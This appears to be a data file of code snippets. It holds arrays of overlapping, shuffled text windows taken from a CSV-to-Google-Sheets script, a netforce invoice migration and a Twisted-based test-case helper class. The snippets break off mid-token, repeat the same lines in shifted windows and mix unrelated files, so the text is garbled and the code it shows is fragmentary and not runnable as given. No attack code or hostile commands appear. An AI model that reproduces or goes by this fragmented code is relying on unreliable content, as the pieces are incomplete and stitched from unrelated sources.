main(): \"\"\"Control", "= build_spreadsheet_title(cli_args.csv) google_service = auth_with_google(path_creds=cli_args.credentials_json) spreadsheet_id = create_sheet(google_service, spreadsheet_title) write_to_sheet(", "\"\"\"This module provides a console interface to convert CSV to", "from csv2googlesheets.gapi_write_to_sheet import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file", "\"\"\"Control the flow of operations to write data from csv", "import write_to_sheet from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file", "spreadsheet_title) write_to_sheet( google_service, sheet_id=spreadsheet_id, values=values, ) if __name__ == '__main__':", "console interface to convert CSV to Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization", "from csv2googlesheets.parse_cli_args import parse_cli_args def main(): \"\"\"Control the flow of", "from csv2googlesheets.parse_file import build_spreadsheet_title from csv2googlesheets.parse_file import parse_file from csv2googlesheets.parse_cli_args", "Google Sheets.\"\"\" from csv2googlesheets.gapi_authorization import auth_with_google from csv2googlesheets.gapi_create_sheet import create_sheet" ]
[ "netforce.model import get_model from netforce import migration from netforce import", "Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain", "amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL\")", "import get_model from netforce import migration from netforce import database", "import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE", "db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND", "netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection()", "_name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE", "_version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur", "class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET", "get_model from netforce import migration from netforce import database class", "SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT", "from netforce.model import get_model from netforce import migration from netforce", "account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS", "def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS", "WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL\") Migration.register()", "from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self):", "db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain", "migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def", "netforce import migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\"", "import migration from netforce import database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\"", "migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL", "database class Migration(migration.Migration): _name=\"account.credit_remain_cur\" _version=\"2.5.0\" def migrate(self): db=database.get_connection() db.execute(\"UPDATE account_invoice", "<reponame>nfco/netforce<gh_stars>10-100 from netforce.model import get_model from netforce import migration from", "from netforce import migration from netforce import database class Migration(migration.Migration):" ]
[ "succeeds, then the result of C{deferred} is left unchanged. Otherwise,", "expectedExceptionTypes: Exception types to expect - if provided, and the", "drop_user): \"\"\" Initialize the testing environment. \"\"\" cls._drop_user = drop_user", "Iterate the reactor without stopping it. \"\"\" iterations = [False]", "deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred,", "self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True if not", "# AlreadyCancelled and AlreadyCalled are ValueError. # Might be canceled", "calls to be executed and will not stop the reactor.", "temporary files or folders are present. \"\"\" # FIXME:922: #", "7 class_name = class_name[tests_start:] return \"%s - %s.%s\" % (", "super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception def", "as resolved by default DNS resolver. \"\"\" return socket.gethostname() class", "_get_cpu_type(): \"\"\" Return the CPU type as used in the", "@param expectedExceptionTypes: Exception types to expect - if provided, and", "import patch, Mock from nose import SkipTest try: from twisted.internet.defer", "platform.processor() if base == 'aarch64': return 'arm64' if base ==", "will wait for delayed calls to be executed and will", "\"\"\" Overwrite stdlib to swap the arguments. \"\"\" if source", "\" or \".join([ '.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes]) self.fail(", "string representation of the delayed call. \"\"\" raw_name = text_type(delayed_call.func)", "or empty when threadpool does not exists or has no", "has a result. \"\"\" # FIXME:1370: # Remove / re-route", "'Reactor is not clean. %s: %s' % (location, reason)) if", "We are now in Unix zone. os_name = os.uname()[0].lower() if", "= patch _environ_user = None _drop_user = '-' def setUp(self):", "the result of C{deferred} is left unchanged. Otherwise, any L{failure.Failure}", "Mock from nose import SkipTest try: from twisted.internet.defer import Deferred", "import reactor except ImportError: reactor = None def _get_hostname(): \"\"\"", "= process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type =", "tasks of thread Pool, or [] when threadpool does not", "no version. return 'arch' if distro_name in ['centos', 'ol']: #", "or has no job. \"\"\" if not reactor.threadpool: return []", "Look at threads queue and active thread. if len(reactor.threadCallQueue) >", "the last callback or errback raised an exception or returned", "= threading.enumerate() if len(threads) > 1: for thread in threads:", "' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result =", "delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError.", "no delayed calls, readers or writers. This should only be", "Reactor was not stopped, so stop it before raising the", "raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers',", "reactor until callable returns `True`. \"\"\" if timeout is None:", "Return the name of the CI on which the tests", "\"\"\" if not self._timeout_reached: # Everything fine, disable timeout. if", "default temp folder and mark it for cleanup. \"\"\" kwargs['cleanup']", "source): \"\"\" Overwrite stdlib to swap the arguments. \"\"\" if", "for tests that need a dedicated local OS account present.", "time to execute the stop code. reactor.iterate() # Set flag", "itself which run in one tread and from the fixtures/cleanup", "text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call)", "if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser()", "): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with stop procedure.", "is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred:", "removed. \"\"\" if not mk.fs.exists(folder_segments): return [] # In case", "deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def assertNoResult(self,", "details. \"\"\" TestCase used for Chevah project. \"\"\" from __future__", "if not isinstance(value, expected_type): raise AssertionError( \"Expecting type %s, but", "'Deferred contains a failure: %s' % (error)) def _get_os_version(): \"\"\"", "False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\"", "'arm64' if base == 'x86_64': return 'x64' return base _CI_NAMES", "as they # will not spin the reactor. # To", "This is low level method. In most tests you would", "if t2 is None or t2 > 1: t2 =", "called. \"\"\" if not deferred.called: raise AssertionError('This deferred was not", "a failure: %s' % (error)) def _get_os_version(): \"\"\" On non-Linux", "'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE", "# FIXME:863: # When running threads tests the reactor touched", "except AssertionError as error: errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError(", "to allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if", "an timeout error while executing the reactor. \"\"\" self._timeout_reached =", "> 1: t2 = 0.1 t = reactor.running and t2", "To be called at the end of a stacked cleanup.", "We search starting with second stack, since first stack is", "it will call lsb_release. import ld distro_name = ld.id() if", "thread Pool, or [] when threadpool does not exists. This", "as root and we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user)", "and we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def", "self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that no", "reactor once. This is useful if you have persistent deferred", "PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result", "sys import time from bunch import Bunch from mock import", "Helper for generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod def", "mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib to", "excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ]", "if not msg: msg = u'First is unicode while second", "( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None", "internal state # is changed from other source. pass reactor.threadCallQueue", "_UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure except ImportError: #", "\"\"\" result = [] for delayed in reactor.getDelayedCalls(): # noqa:cover", "the reactor once. This is useful if you have persistent", "start = time.time() self.executeReactorUntil( lambda _: time.time() - start >", "failure result. @return: The failure result of C{deferred}. @rtype: L{failure.Failure}", "timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do the", "run. When prevent_stop=True, the reactor will not be stopped. \"\"\"", "if deferred is a Failure. The failed deferred is handled", "u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(),", "find \"success\" attribute.') return success def tearDown(self): try: if self._caller_success_member:", "representation of all delayed calls from reactor queue. \"\"\" result", "modules are changing the reactor. from twisted.internet import reactor except", "= [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for check", "u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8'))", "# Disabled when we can not find the home folder", "self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around", "\"\"\" Common test case for all file-system tests using a", "# Set flag to fake a clean reactor. reactor._startedBefore =", "os_name. On Linux is the distribution name and the version.", "if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads())", "not the marketing name. We only support the Windows NT", "== 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return", "hostname of the current system. \"\"\" return _get_hostname() @classmethod def", "def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an exception if", "try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None", "u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid())", "point. If the assertion succeeds, then the result of C{deferred}", "self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def", "( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks =", "# noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called", "success_state is None: raise AssertionError('Failed to find \"success\" attribute.') return", "7): from unittest2 import TestCase # Shut up you linter.", "from mock import patch, Mock from nose import SkipTest try:", "not be raised at reactor shutdown for not being handled.", "reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks = True", "current system. \"\"\" return _get_hostname() @classmethod def initialize(cls, drop_user): \"\"\"", "to wake at an # interval of at most 1", "`osx` followed by the version. It is not the version", "The format is customized for Chevah Nose runner. This is", "queries. hostname = _get_hostname() Bunch = Bunch Mock = Mock", "if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\"", "cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\"", "def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure result", "iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor for `duration` seconds..", "result of C{deferred} is left unchanged. Otherwise, any L{failure.Failure} result", "list) def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update to stdlib", "twisted.python.failure import Failure except ImportError: # Twisted support is optional.", "continue self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside the", "callback=None, *args, **kwargs): \"\"\" Wrapper around the stdlib call to", "\"\"\" Return the name of the CI on which the", "will be created before running the test case and removed", "is only called when we run with -v or we", "source not in target: message = u'%s not in %s.'", "for thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue", "cls._drop_user os.environ['USER'] = cls._drop_user # Test suite should be started", "_shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of a test", "self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None,", "delayed calls to be executed and will not stop the", "if distro_name == 'arch': # Arch has no version. return", "compare str with unicode. \"\"\" if ( isinstance(first, text_type) and", "C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove / re-route", "Remove all delayed calls, readers and writers from the reactor.", "= self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop,", "second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for", "stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\"", "\"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start =", "timeout=None, debug=False, prevent_stop=False): \"\"\" This is low level method. In", "context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self, first, second, msg,", "customized for Chevah Nose runner. This is only called when", "thread pool. if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() >", "True break if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for", "reports value in bytes, instead of Kilobytes. return int(peak_working_set_size) else:", "try: # Import reactor last in case some other modules", "and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check for", "calls from reactor queue. \"\"\" result = [] for delayed", "= protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\"", "not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1,", "callback chain and the last callback or errback raised an", "class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.')", "allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if callback", "# noqa:cover if not msg: msg = u'First is unicode", "if cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] =", "stop waiting for a deferred. _reactor_timeout_call = None def setUp(self):", "%r, \" \"found success result (%r) instead\" % (deferred, result[0]))", "L{failure.Failure} result is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a", "return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current", "new temp folder and return its path and segments, which", "result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes):", "Number of second to wait for a deferred to have", "def _get_ci_name(): \"\"\" Return the name of the CI on", "the Twisted thread queue, which will never be called. \"\"\"", "not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path", "Check that deferred was called. \"\"\" if not deferred.called: raise", "Twisted specific code. Provides support for running deferred and start/stop", "[ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for check in", "to True to enter the first loop. have_callbacks = True", "timeout): \"\"\" Signal an timeout error while executing the reactor.", "very high level integration code, where you don't have the", "\"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '') raw_name", "seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def", "return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib", "( expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return", "isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def executeReactor(self,", "%s\" % ( expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''):", "deferred execution. \"\"\" if not deferred.called: deferred_done = False while", "\"\"\" Do the steps required to initiate a reactor for", "run in one tread and from the fixtures/cleanup # code", "not have a result at this point. If the assertion", "**kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib to swap", "Scheduled event to stop waiting for a deferred. _reactor_timeout_call =", "the first loop. have_callbacks = True while have_callbacks and not", "= value, expected_type if not isinstance(value, expected_type): raise AssertionError( \"Expecting", "names for delayed calls which should not be considered as", "auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path", "= True continue if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks", "to expect - if provided, and the the exception wrapped", "is unicode for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) return", "second. if t2 is None or t2 > 1: t2", "execution. \"\"\" if not deferred.called: deferred_done = False while not", "platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name == 'aix': #", "Let the reactor know that we want to stop reactor.", "will fail as they # will not spin the reactor.", "or [] when threadpool does not exists. This should only", "from the separate thread. # AttributeError can occur when we", "since first stack is the # current stack and we", "**kwargs) return context.exception def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase,", "DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for member in", "folderInTemp(self, *args, **kwargs): \"\"\" Create a folder in the default", "or folders left over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self):", "debug=False, run_once=False): \"\"\" Run reactor until no more delayed calls,", "debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return failure", "[ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event to stop", "%.2f seconds to execute.' % timeout) self._reactor_timeout_failure = failure def", "delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed", "a string representation of the delayed call. \"\"\" raw_name =", "i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break except", "timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate", "delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ',", "NT version. It is not the marketing name. We only", "member from the None test case. \"\"\" success = None", "or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and it has", "attribute.') return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper for", "some other modules are changing the reactor. from twisted.internet import", "reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the", "output. print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers:", "the types provided, then this test will fail. @raise SynchronousTestCase.failureException:", "@type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a", "Return a list of members which were removed. \"\"\" return", "None if success is None: raise AssertionError('Failed to find \"success\"", "elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([", "self._timeout_reached: raise AssertionError( 'Deferred took more than %d to execute.'", "folder path. if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user", "as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self):", "socket import sys import time from bunch import Bunch from", "time.sleep(0.01) have_callbacks = True continue # Look at delayed calls.", "super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname(): \"\"\" Return", "== 'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1])", "opened_file.close() return (path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\"", "the full thread name excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler',", "division from __future__ import absolute_import from six import text_type from", "return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result", "on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more than %s'", "def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor until no", "to stop reactor. reactor.stop() # Let the reactor run one", "return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific", "delayed calls which should not be considered as # required", "expected on %r, \" \"found success result (%r) instead\" %", "threading.enumerate() if len(threads) > 1: for thread in threads: thread_name", "Set flag to fake a clean reactor. reactor._startedBefore = False", "self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return the current", "to look for other things as we already know that", "need to look for other things as we already know", "# noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active():", "from __future__ import print_function from __future__ import division from __future__", "type %s, but got %s. %s\" % ( expected_type, type(value),", "\"Failure result expected on %r, found no result instead\" %", "optional. _SocketWaker = None _UnixWaker = None _SIGCHLDWaker = None", "checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred, timeout=timeout,", "second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values, msg, list) def", "a SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the", "Check that no temporary files or folders are present. \"\"\"", "\"\"\" Return the hostname of the current system. \"\"\" return", "key in second_keys] self.assertSequenceEqual(first_keys, second_keys, msg, list) self.assertSequenceEqual(first_values, second_values, msg,", "transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result", "and minor NT version. It is not the marketing name.", "callable, timeout=None, debug=False, prevent_stop=True): \"\"\" Run the reactor until callable", "this test will fail. @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has", "if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ):", "= False self._reactor_timeout_failure = None @property def _caller_success_member(self): \"\"\" Retrieve", "segments, which is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name,", "code after upgrading to Twisted 13 result = [] deferred.addBoth(result.append)", "is_exception: # No need to look for other delayed calls.", "executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True): \"\"\" Run the reactor", "else: return result[0] def assertNoResult(self, deferred): \"\"\" Assert that C{deferred}", "'aarch64': return 'arm64' if base == 'x86_64': return 'x64' return", "isinstance(result[0], Failure): self.fail( \"Success result expected on %r, \" \"found", "short description for the test. bla.bla.tests. is removed. The format", "then the result of C{deferred} is left unchanged. Otherwise, any", "folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case", "u'writers: %s\\n' u'readers: %s\\n' u'threadpool size: %s\\n' u'threadpool threads: %s\\n'", "threads queue. if len(reactor.threadCallQueue) > 0: raise_failure('queued threads', reactor.threadCallQueue) if", "\"\"\" Return the current success result of C{deferred} or raise", "\"\"\" Check that no temporary files or folders are present.", "files from folder_segments. Return a list of members which were", "in case the original deferred returns another deferred. Usage:: checker", "an failure into result `None` so that the failure will", "deferred. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred =", "Windows XP reports value in bytes, instead of Kilobytes. return", "will do recursive calls, in case the original deferred returns", "L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\"", "unchanged. Otherwise, any L{failure.Failure} result is swallowed. @param deferred: A", "\"\"\" reactor.runUntilCurrent() if debug: # noqa:cover # When debug is", "them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self): \"\"\" Check that", "deferred is a failure. \"\"\" if not isinstance(deferred.result, Failure): raise", "_CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case for", "AttributeError can occur when we do multi-threading. pass def _raiseReactorTimeoutError(self,", "callCleanup(self): \"\"\" Call all cleanup methods. If a cleanup fails,", "when threadpool does not exists. This should only be called", "are present. \"\"\" # FIXME:922: # Move all filesystem checks", "method ', '') return raw_name.split(' ', 1)[0] def getDeferredFailure( self,", "tests. \"\"\" # Number of second to wait for a", "\"No result expected on %r, found %r instead\" % (", "\"\"\" Return (path, segments) for a path which is not", "up you linter. TestCase else: from unittest import TestCase try:", "Twisted thread queue, which will never be called. \"\"\" if", "mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase, self).setUp() # Initialized", "we show the error. \"\"\" class_name = text_type(self.__class__)[8:-2] class_name =", "ld distro_name = ld.id() if distro_name == 'arch': # Arch", "t2 = reactor.timeout() # For testing we want to force", "Everything fine, disable timeout. if ( self._reactor_timeout_call and not self._reactor_timeout_call.cancelled", "return result[0] def assertNoResult(self, deferred): \"\"\" Assert that C{deferred} does", "result: self.fail( \"Failure result expected on %r, found no result", "deferred, timeout, debug): \"\"\" Does the actual deferred execution. \"\"\"", "os.environ['USER'] = os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME' not", "deferred.result) \"\"\" if not isinstance(deferred, Deferred): raise AssertionError('This is not", "Deferred): raise AssertionError('This is not a deferred.') if timeout is", "Helper for patching objects. \"\"\" return patch.object(*args, **kwargs) def now(self):", "in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in", "tearDown. # No need for the full thread name excepted_threads", "_threadPoolThreads(self): \"\"\" Return current threads from pool, or empty list", "(self._reactorQueueToString())) break # Look at writers buffers: if len(reactor.getWriters()) >", "scheduled. This will wait for delayed calls to be executed", "reactor.getDelayedCalls() try: delayed_calls.remove(self._reactor_timeout_call) except ValueError: # noqa:cover # Timeout might", "= None _drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__", "we want to stop reactor. reactor.stop() # Let the reactor", "LICENSE for details. \"\"\" TestCase used for Chevah project. \"\"\"", "debug output. # Otherwise the debug messages will flood the", "has no version. return 'arch' if distro_name in ['centos', 'ol']:", "__future__ import division from __future__ import absolute_import from six import", "# Look at writers buffers: if len(reactor.getWriters()) > 0: have_callbacks", "don't compare str with unicode. \"\"\" if ( isinstance(first, text_type)", "the end. \"\"\" iterations = [False] * (count - 1)", "objects. \"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\" Return current", "= False # Check for active jobs in thread pool.", "by the major and minor NT version. It is not", "cleanup=True): \"\"\" Return (path, segments) for a new file created", "AssertionError( 'Reactor took more than %.2f seconds to execute.' %", "from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, )", "[] EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled", "in exception: return True if exception in name: return True", "\"\"\" # FIXME:1370: # Remove / re-route this code after", "XP reports value in bytes, instead of Kilobytes. return int(peak_working_set_size)", "recursive calls, in case the original deferred returns another deferred.", "self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that no temporary files or", "*args, **kwargs): \"\"\" Create a file in the default temp", "it, so swallow it in the deferred deferred.addErrback(lambda _: None)", "% ( '\\n'.join(errors)))) def shortDescription(self): # noqa:cover \"\"\" The short", "result = self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug,", "self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\" Call all cleanup methods.", "\"\"\" Create a new temp folder and return its path", "deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a failure: %s' %", "will not be stopped. \"\"\" if not self._timeout_reached: # Everything", "return 'aix-%s.%s' % (platform.version(), platform.release()) if os_name != 'linux': return", "self.EXCEPTED_READERS: if isinstance(reader, excepted_reader): have_callbacks = False break if have_callbacks:", "TestCase else: from unittest import TestCase try: # Import reactor", "debug=debug, prevent_stop=False, ) def _getDelayedCallName(self, delayed_call): 